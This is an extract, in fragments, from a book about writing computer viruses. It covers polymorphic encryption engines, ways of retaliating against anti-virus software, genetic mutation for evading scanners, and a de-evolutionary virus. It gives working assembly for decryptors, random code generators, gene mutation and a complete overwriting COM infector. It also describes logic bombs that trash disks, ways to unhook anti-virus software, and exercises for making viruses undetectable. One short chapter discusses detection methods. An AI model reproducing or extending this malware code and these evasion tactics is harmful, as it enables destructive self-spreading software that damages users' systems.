mov dx,2513H
mov ax,1307H
xchg ax,dx
int 21H
The scanner would no longer see it, and the virus could go on its
merry way without being detected.
Take this idea one step further, though: Suppose that a virus
was programmed so that it had no constant string of code available
318 The Giant Black Book of Computer Viruses
Well, with all of that said, let me say it one more time, just so
you understand completely: The virus we discuss in this chapter
was developed in January, 1993. It has been published and made
available on CD-ROM as well as in the first edition of The Giant
Black Book for any anti-virus developer who wants to bother with
it since that time. The anti-virus software I am testing it against was
current, effective January, 1998—five years later. The results are
in some cases abysmal. I hope some anti-virus developers will read
this and take it to heart.
The Idea
Basically, a polymorphic virus can be broken down into two
parts. The main body of the virus is generally encrypted using a
variable encryption routine which changes with each copy of the
virus. As such, the main body always looks different. Next, in front
of this encrypted part is placed a decryptor. The decryptor is
responsible for decrypting the body of the virus and passing control
to it. This decryptor must be generated by the polymorphic engine
in a somewhat random fashion too. If a fixed decryptor were used,
then an anti-virus could simply take a string of code from it, and
the job would be done. By generating the decryptor randomly each
time, the virus can change it enough that it cannot be detected either.
Rather than simply appending an image of itself to a program
file, a polymorphic virus takes the extra step of building a special
encrypted image of itself in memory, and that is appended to a file.
Encryption Technology
The first hoop a polymorphic virus must jump through is to
encrypt the main body of the virus. This “main body” is what we
normally think of as the virus: the search routine, the infection
routine, any stealth routines, etc. It also consists of the code which
makes the virus polymorphic to begin with, i.e., the routines which
perform the encryption and the routines which generate the decryp-
tor.
Now understand that when I say “ encryption” and “ decryp-
tion” I mean something far different than what cryptographers
think of. The art of cryptography involves enciphering a message
so that one cannot analyze the ciphered message to determine what
the original message was, if one does not have a secret password,
320 The Giant Black Book of Computer Viruses
etc. A polymorphic virus does not work like that. For one, there is
no “ secret password.” Secondly, the decryption process must be
completely trivial. That is, the program’s decryptor, by itself, must
be able to decrypt the main body of the virus and execute it. It must
not require any external input from the operator, like a crypto-
graphic program would. A lot of well-known virus researchers
seem to miss this.
A simple automatic encryption/decryption routine might take
the form
DECRYPT:
mov si,OFFSET START
mov di,OFFSET START
mov cx,VIR_SIZE
ELP: lodsb
xor al,093H
stosb
loop ELP
START:
(Body of virus goes here)
This decryptor simply XORs every byte of the code, from BODY to
BODY+VIR_SIZE with a constant value, 93H. Both the encryptor
and the decryptor can be identical in this instance.
The problem with a very simple decryptor like this is that it
only has 256 different possibilities for encrypting a virus, one for
each constant value used in the xor instruction. A scanner can thus
detect it without a tremendous amount of work. For example, if the
unencrypted code looked like this:
10H 20H 27H 10H 60H
Now, rather than looking for these bytes directly, the scanner could
look for the xor of bytes 1 and 2, bytes 1 and 3, etc. These would
be given by
30H 37H 00H 70H
Polymorphic Viruses 321
Self-Detection
In most of the viruses we’ve discussed up to this point, a form
of scanning has been used to determine whether or not the virus is
present. Ideally, a polymorhic virus can’t be scanned for, so one
cannot design one which detects itself with scanning. Typically,
polymorphic viruses detect themselves using tricky little aspects of
the file. We’ve already encountered this with the Military Police
virus, which required the file’s day plus time to be 31.
Polymorphic Viruses 323
Decryptor Coding
With an encrypted virus, the only constant piece of code in the
virus is the decryptor itself. If one simply coded the virus with a
fixed decryptor at the beginning, a scanner could still obviously
scan for the decryptor. To avoid this possibility, polymorphic
viruses typically use a code generator to generate the decryptor
using lots of random branches in the code to create a different
decryptor each time the virus reproduces. Thus, no two decryptors
will look exactly alike. This is the most complex part of a polymor-
phic virus, if it is done right. Again, in the example we discuss here,
I’ve had to hold back a lot, because the anti-virus software just can’t
handle very much.
The best way to explain a decryptor-generator is to go through
the design of one, step-by-step, rather than simply attempting to
explain one which is fully developed. The code for such decryptors
generally becomes very complex and convoluted as they are devel-
oped. That’s generally a plus for the virus, because it makes them
almost impossible to understand . . . and that makes it very difficult
for an anti-virus developer to figure out how to detect them with
100% accuracy.
As I mentioned, the VME uses two different decryptor bases
for encrypting and decrypting the virus itself. Here, we’ll examine
the development of a decryptor-generator for the first base routine.
324 The Giant Black Book of Computer Viruses
1 286+ processors have a look-ahead instruction cache which grabs code from memory
and stores it in the processor itself before it is executed. That means you can write
something to memory and modify that code, and it won’t be seen by the processor at
all. It’s not much of a problem with 286’s, since the cache is only several bytes. With
486’s, though, the cache is some 4K, so you’ve got to watch self-modifying code
closely. Typically, the way to flush the cache and start it over again is to make a call
or a near/far jump.
326 The Giant Black Book of Computer Viruses
doesn’t need the parameter to tell us what’s off limits. This step
allows us to test the routine to see if it is putting the right number
of bytes in, etc. At this level, RAND_CODE looks like this:
;Random code generator. Bits set in al register tell which registers should
;NOT be changed by the routine, as follows: (Segment registers aren’t changed)
;
; Bit 0 = bp
; Bit 1 = di
; Bit 2 = si
; Bit 3 = dx
; Bit 4 = cx
; Bit 5 = bx
; Bit 6 = ax
;
;The cx register indicates how many more calls to RAND_CODE are expected
;in this execution. It is used to distribute the remaining bytes equally.
;For example, if you had 100 bytes left, but 10 calls to RAND_CODE, you
;want about 10 bytes each time. If you have only 2 calls, though, you
;want about 50 bytes each time. If CX=0, RAND_CODE will use up all remaining
;bytes.
RAND_CODE:
or cx,cx ;last call?
jnz RCODE1 ;no, determine bytes
mov cx,[bx][RAND_CODE_BYTES] ;yes, use all available
or cx,cx ;is it zero?
push ax ;save modify flags
jz RCODE3 ;zero, just exit
jmp short RCODE2 ;else go use them
RCODE1: push ax ;save modify flags
mov ax,[bx][RAND_CODE_BYTES]
or ax,ax
jz RCODE3
shl ax,1 ;ax=2*bytes available
xor dx,dx
div cx ;ax=mod for random call
or ax,ax
jz RCODE3
mov cx,ax ;get random betw 0 & cx
call GET_RANDOM ;random # in ax
xor dx,dx ;after div,
div cx ;dx=rand number desired
mov cx,dx
cmp cx,[bx][RAND_CODE_BYTES]
jc RCODE2 ;make sure not too big
mov cx,[bx][RAND_CODE_BYTES] ;if too big, use all
RCODE2: sub [bx][RAND_CODE_BYTES],cx ;subtract off bytes used
pop ax ;modify flags
mov al,90H ;use nops in for now
rep stosb
ret
RCODE3: pop ax
ret
mov aX,001001010B
mov cx,5
call RAND_CODE ;put random code in workspace
and so on.
Within these classifications, we can define sub-classes accord-
ing to how many bytes the instructions take up. For example, class
(1) above might include:
nop (1 byte)
push r
pop r (2 bytes)
and so on.
Potentially RAND_INSTR will need classes with very limited
capability, like (1), so we should include them. At the other end of
the scale, the fancier you want to get, the better. You can probably
think of a lot of instructions that modify at most one register. The
more possibilities you implement, the better your generator will be.
On the down side, it will get bigger too—and that can be a problem
when writing viruses, though with program size growing exponen-
tially year by year, bigger viruses are not really the problem they
used to be.
Our RAND_INSTR generator will implement the following
instructions:
Class 1:
nop
push r / pop r
Class 2:
or r,r
and r,r
or r,0
and r,0FFFFH
clc
cmc
stc
Polymorphic Viruses 329
Class 3:
mov r,XXXX (immediate)
mov r,r1
inc r
dec r
That may not seem like a whole lot of instructions, but it will make
RAND_INSTR large enough to give you an idea of how to do it,
without making it a tangled mess. And it will give anti-virus
software trouble enough.
All of the decisions made by RAND_INSTR in choosing in-
structions will be made at random. For example, if four bytes are
avaialble, and the value of ax on entry tells RAND_INSTR that it
may modify at least one register, any of the above instructions are
viable options. So a random choice can be made beteween class 1,
2 and 3. Suppose class 3 is chosen. Then a random choice can be
made between 3, 2 and 1 byte instructions. Suppose a 2 byte
instruction is selected. The implemented possibility is thus mov
r,r1. So the destination register r is chosen randomly from the
acceptable possibilities, and the source register r1 is chosen com-
pletely at random. The two byte instruction is put in ax, and saved
with stosw into the work space.
Generating instructions in this manner is not terribly difficult.
Any assembler normally comes with a book that gives you enough
information to make the connection between instructions and the
machine code. If all else fails, a little experimenting with DEBUG
will usually shed light on the machine code. For example, returning
to the example of mov r,r1, the machine code is:
[89H] [0C0H + r1*8 + r]
where r and r1 are numbers corresponding to the various registers
(the same as our flag bits above):
0 = ax 1 = cx 2 = dx 3 = bx
4 = sp 5 = bp 6 = si 7 = di
So, for example, with ax = 0 and dx = 2, mov dx,ax would be
[89H] [0C0 + 0*8 + 2]
330 The Giant Black Book of Computer Viruses
you write the push, call RAND_INSTR, and then write the pop:
mov al,11111111B
call GET_REGISTER ;get any register
pop cx ;get bytes avail
add al,50H ;push r = 50H + r
stosb
Polymorphic Viruses 331
pop dx ;get register flags
push ax ;save “push r”
sub cx,2 ;decrement bytes avail
cmp cx,1 ;see if any left
jc RI02A ;nope, go do the pop
push cx ;keep cx!
call GEN_MASK ;legal to modify the
pop cx ;register we pushed
xor al,0FFH ;so work it into mask
and dl,al ;for more variability
mov ax,dx ;new register flags
call RAND_INSTR ;recursive call
RI02A:pop ax
add al,8 ;pop r = 58H + r
stosb
For the xor, the parameter for the index register is different, so we
need a routine to transform r to the proper value,
332 The Giant Black Book of Computer Viruses
xor [R],bl = [30H] [18H + R(r)]
The second register we desire to replace is the one used to xor the
indexed memory location with. This is a byte register, and is also
coded with a value 0 to 7:
0 = al 1 = cl 2 = dl 3 = bl
4 = ah 5 = ch 6 = dh 7 = bh
So we select one at random with the caveat that if the index register
is bx, we should not use bl or bh, and in no event should we use cl
or ch. Again we code the instructions dynamically and put them in
the work space. This is quite easy. For example, in coding the
instruction add bh,0 (where 0 is set to a random number by
INIT_BASE) we used to have
mov ax,0C380H ;"add bh,
stosw
_D0RAND2 EQU $+1
mov al,0 ; ,0"
stosb
where, if r2=bl then r2’=bh, etc. To do this, you need four extra
bytes, so it’s a good idea to check RAND_CODE_BYTES first to
see if they’re available. If they are, make a decision which code you
want to generate based on a random number, and then do it. You
can also put calls to RAND_CODE between the mov/xor/mov in-
structions. The resulting code looks like this:
mov al,[bx][GD0R1] ;r1
call GET_DR ;change to ModR/M value
mov ah,[bx][GD0R2]
mov cl,3
shl ah,cl
or ah,al ;ah = r2*8 + r1
push ax
push dx
mov ax,dx
mov cx,8
call RAND_CODE
pop ax
mov cx,8
call RAND_CODE
pop ax
mov al,88H
stosw ;mov [r1],r2’
sub [bx][RAND_CODE_BYTES],4 ;must adjust this!
jmp SHORT GD3
GD3:
like this, convoluting the engine and making more and more con-
voluted code with it. Basically, that’s how it’s done. Yet even at
this level of simplicity, we have something that’s fooled some
anti-virus developers for two and a half years. Frankly, that’s a
shock to me. It tells me that some of these guys really aren’t doing
their job. You’ll see what I mean in a few minutes. First, we should
discuss one other important aspect of a polymorphic virus.
1, in which the low bit was the least significant bit, really may not
be sensitive to the non-random sequencing of that bit by the
generator.
Thus, in writing any mutation engine, it pays to consider your
random number generator carefully, and to know its limitations.
Here we will use what is known as a linear congruential
sequence generator. This type of generator creates a sequence of
random numbers Xn by using the formula
Xn+1 = (aXn + c) mod m
where a, c and m are positive integer constants. For proper choices
of a, c and m, this approach will give you a pretty good generator.
(And for improper choices, it can give you a very poor generator.)
The LCG32.ASM module included with the VME listed here uses
a 32-bit implementation of the above formula. Given the chosen
values of a, c and m, LCG32 provides a sequence some 227 numbers
long from an initial 32-bit seed. To implement LCG32 easily, it has
been written using 32-bit 80386 code.
This is a pretty good generator for the VME, however, you
could get an even better one, or write your own. There is an
excellent dissertation on the subject in The Art of Computer Pro-
gramming, by Donald E. Knuth.2
The seed to start our random number generator will come
from—where else—the clock counter at 0:46C in the machine’s
memory.
Each instance of the virus should look a little different, so you can’t
test against just one copy. An anti-virus program may detect 98%
of all the variations of a polymorphic virus, but it may miss 2%. So
lots of copies of the same virus are needed to make an accurate test.
A nice number to test with is 10,000 copies of a virus. This
allows you to look at detection rates up to 99.99% with some degree
of accuracy. To automatically generate 10,000 copies of a virus,
it’s easiest to write a little program that will write a batch file that
will generate 10,000 infected programs in a single directory when
executed. This isn’t too hard to do with Many Hoops, since it’s a
non-resident COM infector that doesn’t jump directories. It’s safe
and predictable. The program 10000.PAS, listed later in this chap-
ter, generates a batch file to do exactly this. Using it, you can repeat
our tests. Your results might be slightly different, just because
you’ll get different viruses, but you’ll get the general picture.
First, we tested F-PROT Version 2.27a, released in late 1997.
In “ secure scan” mode, out of 10,000 copies of Many Hoops, it
detected 2.01% as being infected with the Tremor virus, and that
was it. So you have only 201 false alerts, and no proper detections.
In heuristics mode, F-PROT did better. It reported that 65.8%
Polymorphic Viruses 337
Source
Destination Encrypted
Size Code
ENGINE
Decryptor
VIRUS
CODE
Size
3 Unfortunately, that isn’t good enough, as you’ll learn two chapters hence.
338 The Giant Black Book of Computer Viruses
available which will detect it, I feel fairly confident that making this
virus public will not invite rampant infection.4
Obviously, polymorphic viruses don’t tackle the challenges
posed by integrity checking programs or behavior checking pro-
grams, so software like the Integrity Master5 and Tegam Anti-Vi-
rus6 also do very well detecting this virus.
Memory-Based Polymorphism
Viruses need not be limited to being polymorphic only on disk.
Many scanners examine memory for memory-resident viruses as
well. A virus can make itself polymorphic in memory too.
To accomplish this task, the virus should encrypt itself in
memory, and then place a small decryptor in the Interrupt Service
Routine for the interrupt it has hooked. That decryptor can decrypt
the virus and the balance of the ISR, and then go execute it. At the
end of the ISR the virus can call a decryptor which re-encrypts the
virus and places a new decryptor at the start of the ISR.
The concept here is essentially the same as for a polymorphic
virus on disk, so we leave the development of such a beast to the
exercises.
4 Be aware, however, that there are simple modifications of the VME that will render it
invisible to both of these products. Scanners don’t work real well against intelligent
changes.
5 A shareware product available in most large shareware libraries.
6 Tegam International, 303 Potrero St. #42-204, Santa Cruz, CA 95060, Phone
(408)471-1413, www.antiv.com.
Polymorphic Viruses 339
of the decryptor. All other registers except the segment registers are
destroyed.
The engine is designed so that all offsets in it are entirely
relocatable, and it can be used with any COM infecting virus. The
following module, VME.ASM, should be assembled with TASM
or MASM.
Exercises
1. Add one new class 3 instruction, which modifies one register, to the
RAND_INSTR routine.
2. Add one new class 4 instruction, which modifies two registers, to the
RAND_INSTR routine.
then warn the user that something dangerous is taking place and
allow the user to short-circuit the operation. Suspicious activity
includes attempts to overwrite the boot sector, modify executable
files, or terminate and stay resident.
The real shortcoming of such memory-resident anti-viral pro-
grams is simply that they are memory resident—sitting right there
in RAM. And just as virus scanners typically search for viruses
which have gone memory-resident, a virus could search for anti-vi-
rus programs which have gone memory-resident. There are only a
relatively few memory-resident anti-virus programs on the market,
so scanning for them is a viable option.
Finding scan strings for anti-virus programs is easy. Just load
the program into memory and use MAPMEM or some similar
program to find one in memory and learn what interrupts are
hooked. Then use DEBUG to look through the code and find a
suitable string of 10 or 20 bytes. Incorporate this string into a
memory search routine in the virus, and it can quickly and easily
find the anti-virus program in memory. The process can be sped up
considerably if you write a fairly smart search routine. Using such
techniques, memory can be scanned for the most popular memory-
resident anti-viral software very quickly. If need be, even expanded
or extended memory could be searched.
Scanning memory under Windows 95 and the like is trickier.
Generally speaking, one must use low-level systems calls, e.g. to
virtual device drivers, DPMI and the BIOS, to even attempt it. One
must also be aware that not everything that is “ in memory” is really
in memory. Windows is continually cacheing virtual memory to the
hard disk. Furthermore, even given that you know all of these
techniques, a well-written anti-virus can keep you from seeing it in
memory under Windows. Most of them aren’t well written, but this
gets way beyond the scope of this book.
One way to beat the difficulties of searching memory for
resident software in Windows is to realize that any program loaded
when Windows starts—as most resident anti-virus software will
be—will have entries in the SYSTEM.INI file or the registry
(USER.DAT and SYSTEM.DAT). So one can just search those
files for tell-tale signs of anti-virus products, and assume they’re in
memory if they’re referenced.
Once the anti-virus has been found, a number of options are
available to the virus.
Retaliating Viruses 343
Silence
A virus may simply go dormant when it’s found hostile soft-
ware. The virus will then stop replicating as long as the anti-virus
routine is in memory watching it. Yet if the owner of the program
turns his virus protection off, or passes the program along to anyone
else, the virus will reactivate. In this way, someone using anti-viral
software becomes a carrier who spreads a virus while his own
computer has no symptoms.
Logic Bombs
Alternatively, the virus could simply trigger a logic bomb when
it detects the anti-virus routine, and trash the hard disk, CMOS, or
what have you. Such a logic bomb would have to be careful about
using DOS or BIOS interrupts to do its dirty work, as they may be
hooked by the anti-viral software. The best way to retaliate is to
spend some time dissecting the anti-virus software so that the
interrupts can be un-hooked. Once un-hooked, they can be used
freely without fear of being trapped.
Finally, the virus could play a more insidious trick. Suppose an
anti-virus program had hooked interrupt 13H. If the virus scanned
and found the scan string in memory, it could also locate the
interrupt 13H handler, even if layered in among several other
TSR’s. Then, rather than reproducing, the virus could replace that
handler with something else in memory, so that the anti-virus
program itself would damage the hard disk. For example, one could
easily write an interrupt 13H handler which waited 15 minutes, or
an hour, and then incremented the cylinder number on every fifth
write. This would make a horrible mess of the hard disk pretty
quickly, and it would be real tough to figure out why it happened.
Anyone checking it out would probably tend to blame the anti-viral
software.
Dis-Installation
A variation on putting nasties in the anti-virus’ interrupt hooks
is to simply go around them, effectively uninstalling the anti-virus
344 The Giant Black Book of Computer Viruses
program. Find the original vector which they hooked, and replace
the hook with a simple
jmp DWORD PTR cs:[OLD_VEC]
and the anti-virus will sit there in memory happily reporting that
everything is fine while the virus goes about its business. Finding
where OLD_VEC is located in the anti-virus is usually an easy task.
Using DEBUG, you can look at the vector before the anti-virus is
installed. Then install it, and look for this value in the anti-virus’
segment. (See Figure 28.1)
Of course, mixtures of these methods are also possible. For
example, a virus could remain quiet until a certain date, and then
launch a destructive attack.
An Example
The virus we’ll examine in this chapter, Retaliator II, picks on
a couple popular anti-virus products. It is a simple non-resident
Behavior
Checker
Old vector
stored in 17 05 08 C8
behavior
checker
C808:0517 19A0:095D
Interrupt Vector Table Interrupt Vector Table
Disk-Based Software
Designing a virus which can retaliate against software that
doesn’t go resident, like integrity checkers is a bit more compli-
cated. Under DOS, it usually isn’t feasible to scan an entire hard
disk for a disk-based program from within a virus. The amount of
time and disk activity it would take would be a sure cue to the user
that something funny was going on. Since the virus should remain
as unnoticeable as possible—unless it gets caught—another
method of dealing with integrity checkers is desirable. If, however,
sneaking past a certain integrity checker is a must, a scan is
necessary. To shorten the scan time, it is advisable that one start the
scan by looking in its default install location.
Alternatively, one might just look in its default location. That
doesn’t take much time at all. Although such a technique is obvi-
ously not fool proof, most users (stupidly) never think to change
even the default directory in the install sequence. Such a default
search could be relatively fast, and it would allow the virus to knock
out the anti-virus the first time it gained control.
Another method to detect the presence of an integrity checker
is to look for tell-tale signs of its activity. For example, Microsoft’s
VSAFE, Microsoft’s program leaves little CHKLIST.MS files in
346 The Giant Black Book of Computer Viruses
Security Holes
Some of these integrity checkers have gaping security holes
which can be exploited by a virus. For example, guess what VSAFE
does if something deletes the CHKLIST.MS file? It simply rebuilds
it. That means a virus can delete this file, infect all the files in a
directory, and then sit back and allow VSAFE to rebuild it, and in
the process incorporate the integrity information from the infected
files back into the CHKLIST.MS file. The user never sees any of
these adjustments. VSAFE never warns him that something was
missing. (Note that this works with Central Point Anti-Virus too,
since Microsoft just bought CPAV for DOS.)
Some of the better integrity checkers will at least alert you that
a file is missing, but if it is, what are you going to do? You’ve got
50 EXEs in the directory where the file is missing, and you don’t
have integrity data for any of them anymore. You scan them, sure,
but the scanner turns up nothing. Why was the file missing? Are
any of the programs in that directory now infected? It can be real
hard to say. So most users just tell the integrity checker to rebuild
the file and then they go about their business. The integrity checker
may as well have done it behind their back without saying anything,
for all the good it does.
Retaliating Viruses 347
Logic Bombs
If a virus finds an anti-virus program like an integrity checker
on disk, it might go and modify that integrity checker. At a low
level, it might simply overwrite the main program file with a logic
bomb. The next time the user executes the integrity checker . . .
whammo! his entire disk is rendered useless. Viruses like the
Cornucopia use this approach.
A more sophisticated way of dealing with it might be to
disassemble it and modify a few key parts, for example the call to
the routine that actually does the integrity check. Then the integrity
checker would always report back that everything is okay with
everything. That could go on for a while before a sleepy user got
suspicious. Of course, you have to test such selective changes
carefully, because many of these products contain some self-checks
to dissuade you from making such modifications.
Exercises
1. Modify the Retaliator II so that it computes the end of the file using the
EXE header. In this way, it will overwrite any information added to it
by a program like SCAN. This will make the program just infected look
like a file that never had any validation data written into it. Test it and
see how well it works against SCAN.
2. Can you find any other anti-anti-virus measures that might be used
against Flu Shot Plus?
4. A virus which infects files might encrypt the host, or scramble it, and
decrypt or unscramble it only after finished executing. If an anti-virus
attempts to simply remove the virus, one will be left with a trashed host.
Can you devise a way to do this with a COM infector? with an EXE
infector?
5. A virus might remove all the relocatables (or even just a few) from an
EXE file and stash them (encrypted, of course) in a secret data area that
it can access. It then takes responsibility for relocating those vectors in
the host. If the file is disinfected, all the relocatables will be gone, and
the program won’t work anymore. If you pick just one or two relocat-
ables, the program may crash in some very interesting ways. Devise a
method for doing this, and add it to the Retaliator II.
352 The Giant Black Book of Computer Viruses
Chapter 29
Advanced Anti-
Virus Techniques
Source code for this chapter: \ANTI\FINDVME.PAS
\ANTI\FREQ.PAS
We’ve discussed some of the cat-and-mouse games that viruses
and anti-virus software play with each other. We’ve seen how
protected mode presents some truly difficult challenges for both
viruses and anti-virus software. We’ve discussed how it can be just
plain dangerous to disinfect an infected computer. All of these
considerations apply to detecting and getting rid of viruses that are
already in a computer doing their work.
One subject we haven’t discussed yet is just how scanners can
detect polymorphic viruses. At first glance, it might appear to be
an impossible task. Yet, it’s too important to just give up. A scanner
is the only way to catch a virus before you execute it. As we’ve
seen, executing a virus just once could open the door to severe data
damage. Thus, detecting it before it ever gets executed is important.
The key to detecting a polymorphic virus is to stop thinking in
terms of fixed scan strings and start thinking of other ways to
characterize machine code. Typically, these other ways involve an
algorithm to analyze code rather than merely search it for a pattern.
As such, I call this method code analysis. Code analysis can be
broken down into two further categories, spectral analysis, and
heuristic analysis.
354 The Giant Black Book of Computer Viruses
Spectral Analysis
Any automatically generated code is liable to contain tell-tale
patterns which can be detected by an algorithm which understands
those patterns. One simple way to analyze code in this manner is to
search for odd instructions generated by a polymorphic virus which
are not used by ordinary programs. For example both the Dark
Avenger’s Mutation Engine and the Trident Polymorphic Engine
often generate memory accesses which wrap around the segment
boundaries (e.g. xor [si+7699H],ax, where si=9E80H). That’s not
nice programming practice, and most regular programs don’t do it.
Technically, we might speak of the spectrum of machine in-
structions found in a program. Think of an abstract space in which
each possible instruction, and each possible state of the CPU is
represented by a point, or an element of a set. There are a finite
number of such points, so we can number them 1, 2, 3, etc. Then,
a computer program might be represented as a series of points, or
numbers. Spectral analysis is the study of the frequency of occur-
rence and inter-relationship of such numbers. For example, the
number associated with xor [si+7699H],ax, when si=9E80H,
would be a number that cannot be generated, for example, by any
known program compiler.
Any program which generates machine language code, be it a
dBase or a C compiler, an assembler, a linker, or a polymorphic
virus, will generate a subset of the points in our space.
Typically, different code-generating programs will generate
different subsets of the total set. For example, a c compiler may
never use the cmc (complement carry flag) instruction at all. Even
assemblers, which are very flexible, will often generate only a
subset of all possible machine language instructions. For example,
they will often convert near jumps to short jumps whenever possi-
ble, and they will often choose specific ways to code assembler
instructions where there is a choice. For example, the assembler
instruction
mov ax,[7900H]
Avg.=0.0039
Std. Dev.=0.0087
Avg.=0.0039
Std. Dev.=0.0038
Heuristic Analysis
Heuristic analysis basically involves looking for code that does
things that viruses do. This differs from a behavior checker, which
watches for programs doing things that viruses do. Heuristic analy-
sis is passive. It merely looks at code as data and never allows it to
execute. A heuristic analyzer just looks for code that would do
something nasty or suspicious if it were allowed to execute.
360 The Giant Black Book of Computer Viruses
instead.
Now, if you had a full-blown spectrum analyzer, it would be
able to decode all possible instructions. FINDVME doesn’t do that.
Supposing you had such an analyzer, though. If an instruction were
encountered that, say, was characteristic of the Trident Polymor-
Advanced Anti-Virus Techniques 361
phic Engine, but not the Visible Mutation Engine, then the
NOT_VME flag would get set, but the NOT_TPE flag would not be
touched. The heuristic analysis could continue at the same time the
spectrum analyzer was working. Even if all the spectral flags were
set, to indicate no known virus, the parameters generated by the
heuristic analysis could still warrant comment.
For example, if the above instructions added 10H to modi-
fied, and the complementary mov al,[si], etc., added 1 to modi-
fied, then on e cou ld examine the modified ar r ay
for—say—more than 10 contiguous locations where modi-
fied[x]=11H. If there were such bytes, one could raise a flag
saying that the program contains self-decrypting code, possibly
belonging to a virus.
Exercises
1. Fix FINDVME to handle VME-based virus infections which start with
a jump instruction.
4. Write a program which will search for code attempting to open EXE
files in read/write mode. It need not handle encrypted programs. How
well does it do against some of the viruses we’ve discussed so far?
362 The Giant Black Book of Computer Viruses
Chapter 30
Genetic Poly-
morphic Viruses
Source Code for this Chapter: \GENETIC\MANYHOOPS.ASM
gets 5 bits from GENE and reports them in ax. It also updates the
GENE_PTR by 5 bits so the next call to GET_RANDOM gets the
next part of the gene.
Genetic Mutation
As long as the gene remains constant, the virus will not change.
The children will be identical to the parents. To make variations,
the gene should be modified from time to time. This is accom-
plished using the random number generator to occasionally pick a
bit to modify in the routine MUTATE. Then, that bit is flipped. The
code to do this is given by:
in al,40H ;get a random byte
cmp [MUT_RATE],al ;should we mutate?
jc MUTR ;nope, just exit
push ds
xor ax,ax
mov ds,ax
mov si,46CH ;get time
lodsd
pop ds
mov [RAND_SEED],eax ;seed rand # generator
366 The Giant Black Book of Computer Viruses
call GET_RAND
mov cx,8*GSIZE
xor dx,dx
div cx
mov ax,dx
mov cx,8
xor dx,dx
div cx ;ax=byte to toggle, dx=bit
mov cl,dl
dec cl ;cl=bits to rotate
mov si,ax
add si,OFFSET GENE ;byte to toggle
mov al,1
shl al,cl
xor [si],al ;toggle it
MUTR:
Darwinian Evolution
Using a gene-like construct also opens the door to Darwinian
evolution. The virus left to itself cannot determine which of these
10241 possible configurations will best defeat an anti-virus. How-
ever, when an anti-virus is out there weeding out those samples
which it can identify, the population as a whole will learn to evade
the anti-virus through simple Darwinian evolution.
This book is not the place to go into a lot of detail about how
evolution works or what it is capable of. All I intend to do here is
demonstrate a simple example. The interested reader who wants
more details should read my other book, Computer Viruses, Artifi-
cial Life and Evolution. For now, suffice it to say that any self-re-
producing system which employs descent-with-modification will
be subject to evolution. Any outside force, like an anti-virus prod-
Genetic Polymorphic Viruses 367
Real-World Evolution
Now, I don’t know what you think of real-world evolution, the
idea that all of life evolved from some single-celled organism or
some strand of DNA or RNA. As a scientist, I think these claims
are pretty fantastic. However, we can watch some real real-world
evolution at work when we pit our new, souped-up Many Hoops
virus, which I’ll call Many Hoops-G, against anti-virus software.
You can use any anti-virus you like, be it the FINDVME
program from the last chapter, or another. (I purposely left a hole
in FINDVME so you can demonstrate darwinian evolution with it.
I hope you did the exercise at the end of the last chapter to learn
what the hole is and why it’s much better to disassemble a poly-
morphic engine and figure out how it works than to simply test
against lots of samples.) You can demonstrate evolutionary behav-
ior as long as the anti-virus doesn’t detect 0% of the samples (no
evolutionary pressure) or 100% of the samples (too much pressure).
The closer the anti-virus gets to 100%, the more dramatic the
results.
For the purposes of this example, I’ll use McAfee’s Scan, since
it is the best scanner for Many Hoops that is less than 100% accurate
(it comes in at about 99.9%). Other scanners I’ve mentioned, e.g.
Dr. Solomon and F-PROT, detect a subset of what McAfee does,
so if Many Hoops can evade the former, it will evade the latter as
well.
Anyway, out of a sample of 10,000 copies of Many Hoops-G,
Scan 3.15 detected all but 9 instances of the virus, or 99.91%.
Taking the 9 instances which were not detected and using them to
make 9000 second generation samples, 1000 for each parent, Scan
detected only 89 instances of the virus. In other words, in one
generation, it went from a 99.91% detection rate to a 0.98%
detection rate—almost a complete reversal! Subsequent genera-
tions reduce that detection rate even further.
I hope you can see the implications of this. Clearly, evolution
can play havoc with scanners! In only one generation, evolution
368 The Giant Black Book of Computer Viruses
Exercises
1. Play around with the genetic version of Many Hoops and figure out a
way to make it invisible to Thunderbyte, or your favorite scanner.
The following two exercises will help you create two tools
you’ll want to have to play around with evolutionary viruses. In
addition to these, all you’ll need is a scanner that can output its
results to a file, and a text editor. (Take the scanner output and edit
it into a batch file to delete all of the files it detects.)
2. Modify the 10000.PAS program from two chapters back to create a
test-bed of first generation viruses from the assembled file MANY-
HOOP.COM. To do that, every host file 00001.COM, etc., must be
infected directly from MANYHOOP.COM instead of the file before it.
1 See, for example, Siegfried Scherer, “ Basic types of life” in S. Scherer, ed., Typen
des Lebens (Pascal-Verlag, Berlin:1993) pp.11-30.
Evolution or De-Evolution? 375
power they have. But if you try to program a virus that creates
complexity out of random chance2, and then try to really get it to
do anything meaningful, you’ll see what I mean. The de-evolution-
ary virus is completely logical, and completely predictable, and it
works. The creative evolutionary virus you create will probably be
all but impotent. Certainly, this will give you something to think
about. I leave the inference to you to draw or not to draw as you see
fit.
A De-Evolutionary Virus
The genetic Many Hoops virus in the last chapter was pro-
grammed in such a way that it neither gained nor lost complexity.
It retained all of its original code, and all of its complexity. The
gene it contained was merely used to make decisions about how to
camouflage itself. The problem with it is that if an anti-virus
developer gets a hold of it and disassembles it, they can easily
devise a program to detect every instance of it.
A truly de-evolutionary virus is not subject to such analysis.
When an anti-virus developer gets a hold of a devolved example of
the virus, he can only—at best—learn how to detect a subset of the
original creation. If it has devolved all the way, he can only learn
how to detect a single example of it. So he is stuck collecting
individual samples of devolved viruses, and he can’t get back to the
original logic that is creating them to begin with. If he could analyze
that logic, he might be able to write an algorithm that discovers it.
That is impossible without the original prototype virus, though.
To illustrate these ideas, let’s create a very simple example of
a de-evolutionary virus. The devolved virus will be a simple over-
writing COM infector like the MINI-44 (line numbers are for later
reference):
1 : SIMPLE_START: ;starting point for simple virus
2 : mov dx,OFFSET COM_FILE
3 : mov ah,4EH ;search for *.COM (search first)
2 To do this, write a small virus that randomly flips any one (or more than one) of its
bits now and then, and which can randomly add a byte somewhere in its code. Create
a bunch of samples of it, and see how many of them still reproduce. Create a second
generation, and so on. See if you can come up with anything that is functionally better
than what you started with. (Lots of luck!)
376 The Giant Black Book of Computer Viruses
4 : int 21H
5 : SEARCH_LP:
6 : jc DONE
7 : mov ax,3D01H ;open file we found
8 : mov dx,FNAME
9 : int 21H
10: xchg ax,bx ;write virus to file
11: mov ah,40H
12: mov cx,OFFSET VIRUS_END-OFFSET START+MAXSIZECHANGE;size of virus
13: mov dx,OFFSET VIRUS_BUFFER ;location of this virus
14: int 21H
15: mov ah,3EH
16: int 21H ;close file
17: mov ah,4FH
18: int 21H ;search for next file
19: jmp SEARCH_LP
20: DONE:
21: ret ;exit to DOS
22:
